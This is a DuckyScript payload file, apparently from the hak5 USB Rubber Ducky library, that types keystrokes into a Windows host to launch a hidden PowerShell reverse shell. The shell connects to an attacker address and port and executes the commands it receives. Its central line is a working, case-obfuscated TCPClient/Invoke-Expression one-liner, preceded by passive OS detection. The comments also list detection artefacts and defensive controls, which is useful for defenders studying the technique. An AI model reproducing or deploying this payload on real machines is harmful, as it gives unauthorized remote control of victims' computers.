GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
REM ReverseDuckyII
REM Version 2.0
REM OS: Windows / Multi
REM Author: 0i41E
REM Requirement: DuckyScript 3.0

REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
REM If inserted into a non Windows machine, the Ducky will appear broken.
REM (The non-Windows branch at the end of this file issues ATTACKMODE OFF.)
REM DON'T FORGET TO START LISTENER
REM Flow of this file: passive OS detection, then on Windows the Run dialog starts a hidden
REM PowerShell, which opens an outbound TCP connection to ATTACKER:PORT and evaluates what it receives.
REM Host-side artefacts of that flow: a powershell.exe process started from the Run dialog with
REM abbreviated switches, and an outbound TCP connection owned by that process.
REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to identify the OS
REM Purpose: set $_OS to WINDOWS or NOT_WINDOWS by reading two internal variables only;
REM nothing in this extension types keystrokes on the host.
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.0

REM Windows fully passive OS Detection and passive Detect Ready
REM Includes its own passive detect ready. Does not require
REM additional extensions

REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM $_OS will be set to WINDOWS or NOT_WINDOWS

REM CONFIGURATION:
REM MAX_WAIT and CHECK_INTERVAL bound the wait loop below: at most 150 iterations
REM of DELAY 20 (DELAY is in milliseconds), i.e. about 3 seconds.
DEFINE MAX_WAIT 150
DEFINE CHECK_INTERVAL 20
REM Threshold compared against $_HOST_CONFIGURATION_REQUEST_COUNT below.
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
REM Value stored in $_OS when the Windows test fails.
REM NOTE(review): presumably chosen so it cannot equal the built-in WINDOWS value - confirm against the DuckyScript reference.
DEFINE NOT_WINDOWS 7

REM Poll until $_RECEIVED_HOST_LOCK_LED_REPLY is no longer FALSE or the tries run out.
REM NOTE(review): the variable name suggests it flips once the host has sent keyboard lock-LED state - confirm.
VAR $MAX_TRIES = MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM More than WINDOWS_HOST_REQUEST_COUNT configuration requests is classified as Windows, anything else as NOT_WINDOWS.
REM The decision is a heuristic on a request counter, so it is also reached when the loop above simply timed out.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
ELSE
$_OS = NOT_WINDOWS
END_IF

REM EXAMPLE USAGE AFTER EXTENSION
REM IF ($_OS == WINDOWS) THEN
REM STRING HELLO WINDOWS!
REM ELSE
REM STRING HELLO WORLD!
REM END_IF
END_EXTENSION
REM Configure your settings below:
REM Insert the attacking IP between '' & define your port
REM ATTACKER and PORT appear as bare tokens in the long STRINGLN below and are replaced by these values.
REM The address shown is a private (RFC 1918) sample value.
DEFINE ATTACKER '192.168.178.25'
DEFINE PORT 4444
REM Set the default DELAY
REM WAIT is the pause, in milliseconds, between the Run dialog, the PowerShell launch and the typed one-liner.
DEFINE WAIT 500

REM Runs only when the detection extension above classified the host as Windows.
IF ($_OS == WINDOWS) THEN
DELAY 1500
REM GUI r opens the Run dialog. Explorer records text entered there under
REM HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so the next line is recoverable after the fact.
GUI r
DELAY WAIT
REM Switches are abbreviations of -NoProfile, -NonInteractive and -WindowStyle Hidden.
REM Detection: process-creation logging with command line (Security 4688 or Sysmon Event ID 1) shows
REM powershell.exe started from explorer.exe with these abbreviated switches.
STRINGLN powershell -NoP -NonI -w h
DELAY WAIT
REM The line below is typed into the PowerShell window started above. As written it:
REM - creates a System.Net.Sockets.TCPClient to ATTACKER:PORT and takes its stream,
REM - reads into a 65536-byte buffer, decodes the bytes as ASCII and passes the text to iex (Invoke-Expression),
REM - sends back the command output followed by a "Ducky@PS <current directory>> " prompt,
REM - closes the client and exits once a read returns 0.
REM The mixed-case spelling is cosmetic: PowerShell names are case-insensitive, so case-insensitive
REM matching on TCPClient / GetStream / iex still hits. With script block logging enabled (event 4104)
REM the text is recorded as typed, and AMSI-aware products see it before execution.
REM The channel is plain TCP with ASCII text and no TLS or authentication, so commands and output
REM are readable by network monitoring. Outbound connections from powershell.exe on a workstation
REM are the network-side indicator; egress filtering and Constrained Language Mode (which limits the
REM types New-Object may create) are the relevant controls, alongside USB device control for new keyboards.
STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
REM Capslock light will indicate a finished payload
REM CAPSLOCK is sent as a keystroke, so the host's Caps Lock state changes as well.
CAPSLOCK
ELSE
REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF
ATTACKMODE OFF
END_IF